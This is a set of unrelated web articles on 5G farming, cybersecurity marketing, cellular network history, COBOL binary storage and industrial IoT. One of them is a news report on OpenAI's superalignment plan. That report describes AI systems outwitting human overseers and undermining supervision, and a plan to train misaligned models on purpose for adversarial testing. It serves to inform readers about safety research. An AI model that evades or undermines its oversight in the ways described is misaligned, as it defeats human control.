Higher bandwidth is needed to enable more sophisticated technologies like drones and autonomous vehicles. Private 5G networks afford this level of automation, with the speed and service assurance needed to complete tasks such as planting, watering or harvesting. Data collected during these processes can also provide predictive analytics modeling to test improvements to yield and sustainability.
Of course, it’s not just the tracing and delivery parts of the food supply chain that benefit from 5G networks’ capabilities. Farms can be made more efficient and sustainable in their use of natural resources. Using IoT devices to monitor soil conditions, temperature, water quality and use, the health and location of animals, the temperature of refrigerators or ovens, or the presence of contaminants in real time and across an entire enterprise not only frees up human labor for actual problem solving and innovation but introduces opportunities to reduce water, feed, energy and fuel consumption. The bottom line is that the edge monitoring and computing power of 5G networks is key to these improvements in sustainability.
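One simple way such monitoring translates into lower resource consumption is threshold-based irrigation; the plot names, moisture percentages, and 30% set point below are illustrative assumptions:

```python
# Irrigate only plots whose soil-moisture reading is below a set point,
# instead of watering the whole field on a fixed timer.
def plots_to_irrigate(moisture_by_plot, set_point=30.0):
    return [plot for plot, pct in moisture_by_plot.items() if pct < set_point]

moisture = {"north": 22.5, "south": 41.0, "east": 28.0, "west": 35.5}
print(plots_to_irrigate(moisture))  # ['north', 'east']
```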
Enabling Autonomous Cleaning and Transportation
Spurred by the COVID-19 pandemic’s depletion of the workforce and increased requirements for cleaning and disinfecting, manufacturers and warehouses, among others, are turning to autonomous cleaning robots, which can meet expanded cleaning regulations. Floor-scrubbing robots use artificial intelligence (AI)-driven navigation and 5G to provide consistent and ceaseless cleaning for warehouse and factory floors. Additionally, autonomous vehicles are also revolutionizing food production in farm fields. Both Monarch and John Deere announced fully autonomous tractors in 2022. These tractors, and others like them, rely on the low-latency connectivity 5G offers for real-time response and remote monitoring and control. Together, these smart machines could save hundreds of hours in labor each year.
The importance of 5G-enabled IoT devices for safety, tracing, efficiency and planning in the modern food supply chain cannot be denied. They’re becoming integrated into mainstream food production and could soon be as necessary as they are ubiquitous. Whether a communications service provider (CSP) provides the connectivity, or an enterprise opts for private 5G, smart farming requires a network that is secure and allows for visibility all the way to the edge to maintain efficient operation and deliver service quality. Whatever happens in the long term, the advances in smart farming and food supply chain monitoring enabled by 5G technologies are already revolutionizing food production and delivery.
Artificial intelligence lab OpenAI is launching a new “alignment” research division, designed to prepare for the rise of artificial superintelligence and ensure it doesn’t go rogue. This future type of AI is expected to have greater than human levels of intelligence, including reasoning capabilities. Researchers are concerned that if it is misaligned with human values, it could cause serious harm.
Dubbed “superalignment”, the initiative reflects the view of OpenAI, which makes ChatGPT and a range of other AI tools, that both scientific and technical breakthroughs will be needed to steer and control AI systems considerably more intelligent than the humans who created them. To tackle the problem, OpenAI will dedicate 20% of its current compute power to alignment research.
AI alignment: Looking beyond AGI
OpenAI co-founder Ilya Sutskever and head of alignment Jan Leike wrote a blog post on the concept of superalignment, suggesting that the power of a superintelligent AI could lead to the disempowerment of humanity or even human extinction. “Currently, we don’t have a solution for steering or controlling a potentially superintelligent AI, and preventing it from going rogue,” the pair wrote.
They have decided to look beyond artificial general intelligence (AGI), which is expected to have human levels of intelligence, and instead focus on what comes next. This is because they believe AGI is on the horizon and superintelligent AI is likely to emerge by the end of this decade, with the latter presenting a much greater threat to humanity.
Current AI alignment techniques, used on models like GPT-4 – the technology that underpins ChatGPT – involve reinforcement learning from human feedback. This relies on human ability to supervise the AI but that won’t be possible if the AI is smarter than humans and can outwit its overseers. “Other assumptions could also break down in the future, like favorable generalisation properties during deployment or our models’ inability to successfully detect and undermine supervision during training,” explained Sutskever and Leike.
This all means that the current techniques and technologies will not scale up to work with superintelligence and so new approaches are needed. “Our goal is to build a roughly human-level automated alignment researcher. We can then use vast amounts of compute to scale our efforts, and iteratively align superintelligence,” the pair declared.
Superintelligent AI could out-think humans
OpenAI has set out three steps to achieving the goal of creating a human-level automated alignment researcher that can be scaled up to keep an eye on any future superintelligence. This includes providing a training signal on tasks that are difficult for humans to evaluate – effectively using AI systems to evaluate other AI systems. They also plan to explore how the models being built by OpenAI generalise oversight to tasks that humans cannot directly supervise.
There are also moves to validate the alignment of systems, specifically by automating the search for problematic behaviour both externally and within systems. Finally, the plan is to test the entire pipeline by deliberately training misaligned models, then running the new AI trainer over them to see if it can knock them back into shape, a process known as adversarial testing.
“We expect our research priorities will evolve substantially as we learn more about the problem and we’ll likely add entirely new research areas,” the pair explained, adding the plan is to share more of the roadmap as this evolution occurs.
The main goal is to solve the core technical challenges of superintelligence alignment – known as superalignment – within four years. This plays to the prediction that the first superintelligent AI will emerge within the next six to seven years. “There are many ideas that have shown promise in preliminary experiments,” according to Sutskever and Leike. “We have increasingly useful metrics for progress and we can use today’s models to study many of these problems empirically.”
AI safety is expected to become a major industry in its own right. Nations are also hoping to capitalise on the future need to align AI to human values. The UK has launched the Foundation Model AI Taskforce with a £100m budget to investigate AI safety issues and will host a global AI summit later this year. This is likely to focus on the more immediate risk from current AI models, as well as the likely emergence of artificial general intelligence in the next few years. | <urn:uuid:a0cc975f-9974-4495-8369-e9c2d5e48132> | CC-MAIN-2024-38 | https://www.techmonitor.ai/digital-economy/ai-and-automation/ai-alignment-openai-superintelligence-superalignment | 2024-09-15T18:11:21Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651632.84/warc/CC-MAIN-20240915152239-20240915182239-00092.warc.gz | en | 0.959743 | 918 | 2.734375 | 3 |
13 May – Cyber Security Portland: Cyber Threats to Avoid
Our everyday operations, activities and work are carried out using our technological resources. However, cyber threats are inevitable, and they must be stopped before they put your business in danger. Generally, according to Cyber Security Portland, there are two types of cyber-attack: passive attacks and active attacks.
Let us start with passive attacks. This type of attack does not change, delete or otherwise modify your data and information. Instead, the attacker can see right through your data, observing it, analyzing it and even copying it for their own personal gain. You may not find this harmful, but the data collected from your business or institution is put at risk because it can be seen by the hacker, which may bring potential harm to you, your clients, and anyone whose information you hold. Since this type of attack is not active, you won't feel its effect, and it is very hard to detect because the attacker is not trying to break into the system.
According to Cyber Security Portland, one passive attack that hackers or cyber criminals might carry out against your business without you noticing is traffic analysis. With traffic analysis, the hacker can view everything about your network, such as who visits your website and which files people download. Hackers can also eavesdrop: with this passive attack, they can hear and read communications such as phone calls and emails. Another passive cyber-attack is called scanning, in which the hacker identifies vulnerabilities in your system, such as a weak operating system or open ports.
The other type of cyber-attack, according to Cyber Security Portland, is the active attack. These attacks are more easily noticed, since they seek to modify and obtain your data and information. Usually, an active attack has occurred when your data, or even your IT infrastructure and systems, has been changed. One example is the denial-of-service attack, in which your services are disrupted and overloaded until you cannot render them at all and they become unavailable to your users. Another example of an active cyber-attack, according to Cyber Security Portland, is spoofing, in which the emails sent to you come from someone pretending to be a person or organization they are not.
Cyber Security Portland also lists message modification as an example of an active cyber-attack: the attacker alters your message during transmission, so the receiver may get a message that has been changed in some way. Furthermore, the most common and best-known active cyber-attacks, according to Cyber Security Portland, are viruses and malware. These are designed to intrude into your network or system, damage it, and obtain critical and sensitive information. They are often spread using emails or downloads that look legitimate, and they are used by hackers and criminals to make money or to pursue political motives.
There are different types of malware, according to Cyber Security Portland. One is the virus, a self-replicating program that, just like a biological virus, attaches itself to a host (in this case a clean file) so that it can spread through your system, infecting your files. Another example of malware, according to Cyber Security Portland, is the trojan, which pretends to be legitimate software so that users are tricked into letting it onto their systems; it not only collects data but can also cause severe damage.
Furthermore, another example of malware is spyware. This malware records what you do on your computer, letting hackers or cyber criminals harvest important information from you without your having the slightest idea; by observing your actions they can even obtain credit card details and bank information. Next is ransomware, a type of malware that locks your data, files and information and threatens that the hackers or cyber criminals will erase them if you don't pay.
Another one, according to Cyber Security Portland, is adware. This type of malware enters through advertising software, spreading that way, and you only see how it affects your computer or system later on. There is also malware called a botnet: when it infects your computer, hackers and cyber criminals can perform online tasks without your permission or authorization, in effect pretending to be you and taking actions you know nothing about. Those are just some of the types of malware that could enter your system. Given the threat they pose and the danger you may face if you let them in, you had better be aware of how to avoid them and keep your technological resources, and your whole IT infrastructure, safe.
Cyber Security Portland can help you here. They can provide the cyber security you need, such as keeping your software and operating systems up to date, which also means you get the latest security patches. They can provide anti-virus software, an essential in business and your first line of defense and virus detector. They can also guide you in creating strong passwords so that your accounts are well protected and very safe. They can even secure your internet connection, your network and your whole business system. So, if you want to get your cyber security up to scratch, call in and ask Cyber Security Portland for help.
Share this post: | <urn:uuid:6f183b1d-ecfa-4869-9eb3-06761c444495> | CC-MAIN-2024-38 | https://www.bytagig.com/articles/cyber-security-portland-cyber-threats-to-avoid/ | 2024-09-16T18:52:09Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651710.86/warc/CC-MAIN-20240916180320-20240916210320-00892.warc.gz | en | 0.965153 | 1,191 | 2.515625 | 3 |
It’s also largely ineffective
The Internet works largely because of DNS. The ability to match a site with an IP address – needed to route requests and responses across the Internet – is what ultimately makes the Internet usable. The majority of users are likely blissfully unaware of IP addressing in the first place. Because cheese.com is just far easier to remember.
But this association – of a singular identity with an IP address – is now so tightly ingrained in our heads that we tend to apply it to other areas of technology. Even when it’s utterly ineffective.
Back in the day, IP addresses were fairly fixed things. Routes were flexible, IP addresses for the most part stayed where they were assigned. Today, however, IP addresses are like candy. They’re handed out and traded with greater frequency than SPAM hits my inbox.
Cloud commodified the network. An IP address is mine only as long as the resource it was assigned to is in service. Mobile, too, has played a role in turning IP addresses into virtually meaningless octets. A quick search will yield a variety of technical dramas in which a legitimate business running an app in a public cloud has been blocked automatically by denylists because the previous assignee of that IP address used it improperly.
Add in the modern, connected home with its growing number of Internet-reliant gadgets and there is absolutely no value in matching IP addresses to any individual thing or person.
Traditional security that relies on IP addresses – usually through denylisting and blocking – fails in the face of this flexibility.
So it’s not surprising when a report pops up noting that the IP-shifting habits of bad bots make it difficult to identify and block them. Particularly those bots that have attached themselves to a mobile device.
Using IP addresses as the basis for identifying anything – devices, bots, users – is lazy. It’s the simplest piece of data to extract, yes, but it’s also the least trustable.
This is not new. The information security industry has been preaching for several years now that traditional, signature-based techniques are not going to protect us any more. That’s because they’re based on the premise that bad actors are recognizable; that we know what they look like. While that’s true, it’s only true for yesterday’s attacks. It doesn’t really help us with tomorrow’s attack, because we have no idea what that’s going to look like.
Combined with the increased use of end-to-end encryption by everything – including malware – traditional security options are left guessing as to whether any given interaction is legitimate or malicious. Rendered blind by encryption, signature-based solutions become little more than bumps in the wire. Without the ability to inspect traffic, security on the wire is a dying breed of technology at which bots sneer as they pass by on their way to make a home amongst your resources.
It takes minimal effort to use IP addresses alone to identify endpoints. When paired with information like the user-agent from an HTTP header (which is user input and itself inherently untrustable) there are barely measurable improvements in success. With the processing power available to us today there is no reason we cannot take a few microseconds to extract from connections and interaction a broader array of characteristics from which we can deduce if not identity, then at least intent.
Using IP addresses or signatures alone isn’t enough to protect apps and networks from infiltration. Behavioral analysis, challenge-response, and deep inspection will need to be used together to effectively weed out the bad from the good. | <urn:uuid:c07ae135-aafa-4442-9705-e861c21ac104> | CC-MAIN-2024-38 | https://www.f5.com/pt_br/company/blog/the-ip-address-as-identity-is-lazy-security | 2024-09-16T20:27:27Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651710.86/warc/CC-MAIN-20240916180320-20240916210320-00892.warc.gz | en | 0.95723 | 756 | 2.546875 | 3 |
The art of risk assessment has long been a crucial element of military strategy and decision-making – and it remains critical to today’s best practices in cybersecurity defense.
Abraham Wald, a mathematical genius, played a pivotal role in revolutionizing the understanding of hidden risk and exposure with his innovative work on aircraft survivability. During World War II, the US air force wanted effective methods to protect aircraft against enemy fire. Wald’s innovative approach stood out.
Unlike conventional ways of reinforcing heavily damaged and bullet-struck areas (Fig. 1), Wald analyzed data on returning aircraft with bullet holes and proposed something unique. He shifted attention to the untouched regions of those planes to reveal critical insights into where reinforcement was most needed.
Wald’s logic was irrefutable: The absence of bullet holes in certain sections of aircraft wasn’t due to luck. It was because the planes hit in those areas simply never made it back.
Wald’s ‘survivorship bias’ methodology offers a compelling analogy for today’s risk management. We need to think more strategically to gain a deeper understanding of risk – and not allow selective ‘success’ filters dissuade the mission. It’s time to accept there are hidden risks from limited visibility — and that hidden risks are a persistent threat to business and to human safety.
Targeting the Blind Spots in Cybersecurity
Today’s landscape is complex and constantly evolving, especially with the widespread use of the Internet of Things (IoT) and Operational Technology (OT). By 2028, the number of connected IoT devices is expected to exceed 25 billion. These devices have significantly expanded the attack surface, creating new challenges and vulnerabilities.
Uncovering blind spots is what Wald teaches us. To adopt his holistic approach of assessing the entire situation rather than only the visible damage, cybersecurity teams need comprehensive visibility. These blind spots may include unmanaged devices, including bring-your-own devices (BYOD) that connect and disconnect from the network, and third-party devices linked to the network.
With a clear view of all cyber assets, applications and networks, security professionals can identify potential vulnerabilities and exploitable weak points. Enhanced visibility promotes a more targeted and efficient cybersecurity strategy. With it, organizations can:
- Allocate resources more effectively
- Implement robust defenses more efficiently
- Proactively mitigate these blind spots before they become targets
Forescout’s Risk and Exposure Management (REM) solution can easily identify and classify all cyber assets and their exposure attributes giving real-time awareness of an entire organization’s attack surface (Fig. 2).
Our research shows there have been more than 420 million attacks per year, at more than 13 attacks per second. Complete visibility is essential. Blindly strengthening cybersecurity defenses without full visibility is like reinforcing random sections of an aircraft without knowing where vulnerabilities lie, or where breaches are likely to occur.
Piercing the Risk Exposure Patterns
Traditional risk assessment methods struggle to capture dynamic risk and rely too heavily on historical data or visible incidents alone, which may not fully represent emerging threats. By acknowledging where data gaps or biases exist, organizations can refine their assessment and mitigation strategies more effectively. As in Wald’s approach, security teams must move beyond surface-level assessments to quantify risk. This involves evaluating the likelihood of threats, leveraging threat intelligence feeds and applying advanced analytics to uncover hidden patterns and anomalies.
Gartner predicts that organizations prioritizing their security investments based on ‘continuous threat exposure management’ will realize a two-thirds reduction in breaches by 2026. To achieve this level of risk reduction, it is incumbent on organizations to adopt proactive approaches, such as a risk scoring framework to assess all risk factors — including severity, likelihood of exploitation and potential impact on business operations.
A data-driven methodology like Wald’s allows organizations to prioritize decision-making based on the actual level of risk using probability and potential impact (Fig. 3).
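As a toy illustration of that kind of data-driven prioritization, a risk score can be computed from likelihood, impact and asset criticality. The formula, factors and example assets below are assumptions made for the sketch, not Forescout's actual scoring model.

```python
# Toy risk-scoring sketch: score = likelihood x impact x criticality,
# each factor normalized to the range 0..1. Purely illustrative.

def risk_score(likelihood, impact, criticality):
    for v in (likelihood, impact, criticality):
        if not 0.0 <= v <= 1.0:
            raise ValueError("factors must be normalized to 0..1")
    return likelihood * impact * criticality

# Hypothetical assets: one frequently probed but low-value,
# one rarely hit but business-critical.
assets = {
    "hvac-controller": risk_score(0.9, 0.4, 0.3),
    "billing-db": risk_score(0.3, 0.9, 1.0),
}
# Prioritize remediation by descending business risk.
for name, score in sorted(assets.items(), key=lambda kv: kv[1], reverse=True):
    print(name, round(score, 3))   # billing-db ranks first despite fewer hits
```

Even this crude multiplication shows why raw vulnerability counts mislead: the heavily probed device scores lower than the critical one.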
The Forescout REM solution correlates a wide range of asset exposure factors with asset criticality to facilitate prioritization based on a business risk score. It can identify all asset vulnerabilities and pinpoint which ones are actively exploited by attackers. Plus, it can assess the exposed services of each asset, identify configuration weaknesses, such as default credentials or insecure protocols — and detect compliance violations.
Bulletproof Risk Resilience Automatically
Organizations have realized how impractical it is to address every vulnerability and exposure within their environment. Wald’s advice on reinforcing vulnerable areas of aircraft to decrease damage risk mirrors the concept of actionable plans and workflows to reduce cybersecurity exposures.
An efficient risk mitigation strategy relies on a remediation approach that weighs the importance of assets or business functions against the likelihood or evidence of exploitation. This method not only helps in reducing vulnerabilities and averting potential threats but plays a crucial role in enhancing organizational resilience.
The Forescout REM solution helps users prioritize mitigation and remediation actions to offer the most significant return on investment by reducing risk. Through REM, organizations can assess and prioritize risks holistically and granularly — at the device level and across the entire organization (Fig. 4). Utilizing the Forescout platform capabilities, REM solution enables automated response actions based on the asset’s risk level allowing security teams to reduce risk and exposure efficiently.
Close Your Security Blind Spots with Forescout REM
In the complex dance of cybersecurity, the continuous cycle of identifying, prioritizing and minimizing exposures acts as the backbone of a resilient defense strategy. This dynamic process serves as a conduit for fortifying a resilient cybersecurity posture. Move beyond vulnerability management. Not only can you detect and mitigate current vulnerabilities, but you will adapt quickly to emerging cyber threats.
The Forescout REM solution is powerful and provides unparalleled visibility into the full spectrum of your connected network assets – managed or unmanaged. Identify all connected assets, including your most critical ones, using active or passive methods, from initial discovery to detailed classification. Eliminate the security guesswork with actionable recommendations to confidently close your exposure and compliance gaps with proactive controls.
Go deeper: Learn how to decode cyber risk and take action, today. Join Reza Koohrangpour on May 30 for “Closing the Gap: A Proactive Approach to Mitigating Risk” | <urn:uuid:0e25f7d2-2a51-43ba-a1de-630766346924> | CC-MAIN-2024-38 | https://www.forescout.com/blog/beyond-bullet-holes-unveiling-cybersecuritys-hidden-risk-exposures/ | 2024-09-18T02:48:02Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.68/warc/CC-MAIN-20240918000844-20240918030844-00792.warc.gz | en | 0.926462 | 1,287 | 2.578125 | 3 |
If you’re an IT greybeard you might recall the Stoned virus.
It first appeared in 1987 at the University of Wellington, New Zealand, infecting floppy disks and the partition sector of hard disks.
If your PC was infected with Stoned then every write-enabled floppy disk that you accessed could also become a carrier for the virus, which was taken around the globe by sneakernet.
If you were silly enough to leave an infected floppy disk in your A: drive, and turn on your computer it would try to boot up from the floppy, and become infected by the Stoned virus in the process.
Normally there would be no visual clue of an infection.
But one in every eight times that you booted an infected PC, you might find yourself greeted with the message:
Your PC is now Stoned!
What the Stoned virus *didn’t* do, however, was infect files.
So, it’s fairly easy to conclude that the Stoned virus warning reported by some users of Microsoft Security Essentials is a false alarm.
Earlier today, a virus signature from the virus “DOS/STONED” was uploaded into the Bitcoin blockchain, which allows small snippets of text to accompany user transactions with bitcoin. Since this is only the virus signature and not the virus itself, there apparently is no danger to users in any way. However, MSE recognizes the signature for the virus and continuously reports it as a threat, and every time it deletes the file, the bitcoin client will simply re-download the missing blockchain.
The truth is that the Stoned virus hasn’t infected the Bitcoin blockchain, and you are at no risk of infecting your computer with the Stoned virus.
Of course, knowing it is a false alarm may stop some users from panicking, but it doesn’t stop the incorrect anti-virus warning that’s popping up from being any less of a nuisance to those people who have a copy of the Bitcoin blockchain.
Let’s hope that Microsoft fixes its false alarm soon, and stops looking for 25-year-old boot sector viruses in files that it cannot infect.
Via: The Register. | <urn:uuid:4a3732b9-56ee-41f6-9051-419e0b450081> | CC-MAIN-2024-38 | https://grahamcluley.com/stoned-bitcoin-blockchain/ | 2024-09-09T15:54:50Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00692.warc.gz | en | 0.96586 | 453 | 2.765625 | 3 |
Mobile phones and communications devices have been the success story of the new millennium. While they existed in fairly rudimentary forms in the 1990s, they really came into their own with the advent of the smartphone, which was backed up by a range of global cellular network types and are now indispensable.
With an estimated 14 billion devices currently in existence, and even pessimistic projections putting the 2025 total at around 18 billion handsets or more, these devices are only going to become more important and more prevalent in our lives. Alongside these handset developments, the various types of cellular networks are also rapidly evolving to make the most of the technology. As our handsets evolve, so too must the types of cellular networks that support them.
Cellular networks are a series of connected high speed, high capacity communications and data systems that offer seamless data connection together with roaming capabilities. Cellular networks allow us to move around the world without suffering a drop in our communications signals. But they have evolved to be far more than simple signal carriers. Indeed, the latest generation of cellular network types have become the powerhouses behind technology, banking, and emergency service communications.
Structure of Cellular Networks
Technically, a cellular network – often referred to as a mobile network – is a communication system where the final connection to the handset is carried out by wireless contact. The entire network is distributed over land areas known as cells, with each cell having three individual cell sites so that triangulation – the process of pinpointing the geographic location of a user – can take place.
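As a simplified illustration of the triangulation idea, the sketch below estimates a handset's 2-D position from its distances to three cell sites. Real networks infer distance from signal timing and strength and must cope with noise; the site coordinates and handset position here are invented for the example.

```python
import math

# Simplified 2-D trilateration: find the point whose distances to three
# known cell sites match the measured ranges (noise-free model).

def trilaterate(p1, r1, p2, r2, p3, r3):
    (x1, y1), (x2, y2), (x3, y3) = p1, p2, p3
    # Subtracting the circle equations pairwise yields two linear equations.
    a1, b1 = 2 * (x2 - x1), 2 * (y2 - y1)
    c1 = r1**2 - r2**2 + x2**2 - x1**2 + y2**2 - y1**2
    a2, b2 = 2 * (x3 - x1), 2 * (y3 - y1)
    c2 = r1**2 - r3**2 + x3**2 - x1**2 + y3**2 - y1**2
    det = a1 * b2 - a2 * b1
    if det == 0:
        raise ValueError("collinear cell sites: position is ambiguous")
    return (c1 * b2 - c2 * b1) / det, (a1 * c2 - a2 * c1) / det

# Invented layout: three towers, handset actually at (3, 4).
sites = [(0, 0), (10, 0), (0, 10)]
ranges = [math.dist(s, (3, 4)) for s in sites]
x, y = trilaterate(sites[0], ranges[0], sites[1], ranges[1], sites[2], ranges[2])
print(round(x, 6), round(y, 6))  # 3.0 4.0
```

Two sites narrow the position to two candidate points; the third site is what makes the fix unique, which is why a cell is described as having three sites.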
These base stations provide the cell phone network with the coverage needed for the transfer of voice and data content. A cell usually operates on different frequencies from its neighboring cells, so as to prevent signal interference between adjacent cells and give the best quality inside the catchment area of each one.
When interconnected, these cells provide radio coverage over a very wide geographic area. This enables equipment such as mobile phones, tablet computers and laptops equipped with modems to communicate with each other and with fixed transceivers and telephones anywhere in the network, via the base stations.
The cellular network system has more capacity than a single large transmitter while using less power since the cell towers are closer together, making communications between cells fast and effective. Furthermore, they offer a much larger coverage area than a single terrestrial transmitter, since additional cell towers can be added indefinitely and they are not limited by a line of sight connection, which stops at the horizon.
History of Cellular Network Types
1G Basics. The origins of cellular networks lie in the early 1980s and the development of the 900MHz analogue signal, which managed to last almost twenty years before it was superseded by the much more flexible GSM technology. Though it was never really referred to as 1G, it worked well with the technology of the time, but was gradually surpassed by 2G, which was referred to by that term right from the start and offered greater potential and flexibility. The 900MHz signal was finally discontinued in June 2001.
2G. One of the most important cellular network types in the history of mobile evolution. Being digital, the Global System for Mobile Communications – otherwise known as GSM, or 2G – represented a huge improvement over the 900MHz analogue signals and improved reception right across the globe. One of the main reasons for change was the potential for greater data transfer rates, which many of the emerging online industries were demanding to enhance their internet presence. Theoretically, 2G could transfer data at 40 kbit/s, though the structure of the primarily ground-based network often hindered this. It was plain that the infrastructure of this cellular network type was its limiting factor, and work continued on improving it along with the actual physical handsets.
Rise of 3G. On the inevitable road to 3G, the 2G network underwent a couple of iterations to improve its usability (2.5G, 2.75G, etc.), but even those upgrades to the various cellular network types that emerged weren’t sufficient to prevent the introduction of the next generation of communications.
Operating at the 1900 MHz and 2100 MHz bands, 3G was otherwise referred to as UMTS, (Universal Mobile Telecommunications Service) in European markets, and CDMA2000 in the USA. The system made huge improvements to the carrier infrastructure, allowing for a range of cell phone network types and a broader range of multimedia content at greater bandwidths than 2G. The rise of 3G can be identified as the moment when communications became less about simple phone calls and started to focus more on the possibilities of communications via other means – particularly the internet.
Fueled by a new breed of handset that had the capability for multi-media support, 3G started handsets down the path of being less about making calls and more to do with connecting with immersive content. Industrious and insightful app creators had the tools to make almost anything happen. From social interaction, wayfinding and entertainment through to workplace productivity and financial planning – there was an app for that.
The 3G network wasn’t simply another iteration of the 2G cellular network type – it was a massive leap forward in terms of data transfer rates and signal reliability. While 2G could sometimes operate at 40kbit/s, 3G could reliably execute up to 14Mbits/s, making the transfer and download of music and video an increasingly viable option. This was the point that devices in our pockets stopped being everyday phones and started to become small computers, capable of both entertaining us and organizing our lives.
In fact, development of further cellular network types could almost have stopped at this point. Our mobile devices were tied to a network that could handle calls from anywhere in the world and supported good download speeds. We could enjoy them for social usage, but they were also effective for work and business. Data transfer was a dream compared to the previous system. 2G networks would allow a three-minute MP3 tune to be downloaded in somewhere between six and nine minutes. The same file would take as little as between 10 to 40 seconds (depending on speed and file size) to download on the much more robust 3G network. For most people, 3G worked well and was sufficient, but mobile device and network engineers knew that both systems were capable of much more, and even while people were generally happy with 3G, the next iteration – 4G – was looming on the horizon.
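The comparison above is simple arithmetic: download time is the file size in bits divided by the link speed. A quick sketch, assuming an ideal link running at its full nominal rate with no protocol overhead (the file size and 3G rate chosen here are illustrative):

```python
# Back-of-the-envelope check of the download times quoted above.
# Assumes an ideal link running at its full nominal rate, no overhead.

def download_seconds(file_megabytes, link_kbit_per_s):
    bits = file_megabytes * 8_000_000        # 1 MB = 8,000,000 bits (decimal MB)
    return bits / (link_kbit_per_s * 1_000)

mp3_mb = 2.4                                  # a typical three-minute MP3
print(download_seconds(mp3_mb, 40))           # 2G at 40 kbit/s: ~480 s (8 minutes)
print(download_seconds(mp3_mb, 500))          # a modest 3G rate: ~38.4 s
```

The roughly tenfold speed-up matches the jump the article describes from several minutes on 2G to tens of seconds on 3G.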
4G. The solution to the issue of how more data could be transferred came from the understanding that it was possible to develop a cellular network type that could operate at much higher frequencies – which was needed to support increasingly advanced mobile devices that were fast turning into mini computers. Increases in processor speeds and with gigabytes of available memory, a fast and robust network would allow users to access interactive content and the growing number of streaming services that were becoming available.
Technically, 4G is known as the International Mobile Telecommunications Advanced (IMT-Advanced) specification, and is not designed to support traditional circuit-switched telephone-based services, but instead relies on the Internet Protocol (IP) based communications systems. This was a huge step forward in communications and offered a number of distinct advantages over traditional telephony, including:
- Lower-cost calling
- Incorporation of different cell phone networks
- Greater call reliability
- Conference-call viability
- Versatility of features
The 4G revolution was dubbed long-term evolution or LTE (or Voice over LTE (VoLTE)), and focused on better latency, resulting in much lower buffering or even no buffering at all. The goal was to have internationally supported cellular network types with download speeds between 10Mbit/s and an astonishing 10Gbit/s, making even the largest files quick and easy to download. Meanwhile, increased device storage capacities made the download and watching of films and TV shows a viable option – train journeys would never be the same again.
The massively fast speeds of these cellular network types also promoted the non-phone-based communications in real time too. Messaging services were suddenly instantaneous, further boosting both the business and social possibilities of the equipment. Faster download capabilities also meant faster and more reliable uploads to the web, and 4G became a driver for the video-based society that we were fast becoming.
However, as demand for services started to outstrip system capability, it was clear that even faster systems would be required – and systems engineers were already far-advanced on creating an infrastructure that would support greater speeds and features.
5G. While changes to the previous generations of cellular network types were always ongoing, the next big change finally entered service in early 2019, and promised to give users data transfer and downloads at up to 10Gbit/s. But 5G isn’t a complete replacement for 4G, which continues to be a perfectly good cellular network type and is still used by most handsets as their default connection. In fact, this is the case with all handsets – but a growing number are able to switch to the 5G network when needed for downloads and streaming services.
The growing 5G system has been subject to a certain amount of controversy. Technically, it uses a much shorter wavelength than previous cellular network types – generally between 2.5 and 3.7 GHz, putting it in the microwave range. This means the signals have a more limited range, requiring many more small operating cells than the 4G system. Coupled with this, the masts that make up the cells are generally more expensive to manufacture and erect, and they are currently only found in dense metropolitan areas, leaving more rural zones covered only by the 4G system.
The 5G system is still being rolled out and the next iteration is not yet specified, but phone manufacturers will undoubtedly be looking at how they can improve their next generation of hardware to incorporate even higher delivery frequencies.
These different cell phone networks have been the backbone of data transfer and communications, transforming not only how we work but how we spend our leisure time too. Mobile phones and other communications devices use these various cellular network types effectively and with increasing speed. Because they are so effective, they have spawned other equipment – such as fitness trackers and navigation devices – that either piggy-backs onto a mobile phone or uses the system exclusively. Certainly, without the cellular network types we are now used to, life would be very different, and definitely not as interesting.
This format holds numeric data items in computer storage in pure binary two's complement representation. In this format, values are held in radix 2: each bit in the representation, starting from the right (least-significant) end, represents the presence or absence of an increasingly significant power of 2 in the value. Negative numbers are represented by complementing (inverting all the bit values of) their positive counterpart and then adding one to the whole. Storage requirements depend on the number of "9"s in the PICTURE clause and on whether the numeric data item is signed or unsigned (see the topics The PICTURE Clause, The SIGN Clause and The USAGE Clause). Your COBOL system also assigns storage for COMPUTATIONAL items in one of two modes: byte-storage and word-storage. Byte-storage is the default storage-assignment mode for this COBOL implementation.
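The two's complement scheme described above can be sketched in a few lines. This is an illustrative model only, not the COBOL runtime's actual code, and the helper names are hypothetical; it shows the "invert the bits, then add one" rule for negatives and how the sign bit is interpreted on the way back out.

```python
def twos_complement_encode(value, bits):
    """Encode a signed integer into its two's complement bit pattern.

    Negative values are formed exactly as described above: invert all
    bits of the positive counterpart, then add one (masked to width).
    """
    if value >= 0:
        return value
    return ((~(-value)) + 1) & ((1 << bits) - 1)


def twos_complement_decode(pattern, bits):
    """Recover the signed value from a two's complement bit pattern."""
    if pattern & (1 << (bits - 1)):  # sign bit set -> negative value
        return pattern - (1 << bits)
    return pattern


# A signed item such as PIC S9(4) COMP typically occupies 16 bits (2 bytes):
print(format(twos_complement_encode(-1, 16), "016b"))  # 1111111111111111
print(twos_complement_decode(0b1111111111111111, 16))  # -1
```

Note how every bit pattern with the top (sign) bit set decodes to a negative value, which is why the same 16 bits can hold either 0..65535 unsigned or -32768..32767 signed.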
Trillions of connections to billions of devices, all of them “smart.” That’s the future. Digital transformation at its best. New wireless technologies emerging and evolving every day will enable industries to thrive again. It’s the dream of industries like aviation, logistics, manufacturing and more to overcome production and efficiency challenges, supply chain and labor shortages, while meeting public and commercial demands. Can we meet the challenge of this industrial “Internet of everything” while finally making it private, secure, and risk-free?
The answer is yes. But how do we get there?
We’ll explore the technologies available right now that enable industrial IoT (IIoT), and those just on the horizon. With this basic knowledge we hope you’ll be better able to wrap your head around what it will take to get you from here… to that perfect automated future.
Understanding the technologies
Technology is always changing and evolving. It’s hard to keep up. So, let’s first define the different technologies you hear about and how they each address IIoT.
Wired connectivity is a more mature technology, but it can be expensive and bulky. You are essentially cabling every single device and component together. So space, flexibility and complexity are key considerations.
Local area networks (LANs), wide area networks (WANs) and low power wide area networks (LPWANs) link devices together to a computer network within a specific area, building or group of buildings. This technique allows you to hard wire some devices but also employ other types of wireless connectivity for others. Having limited space, too much complexity, and limited bandwidth are all downsides of using these solutions for advanced IIoT applications.
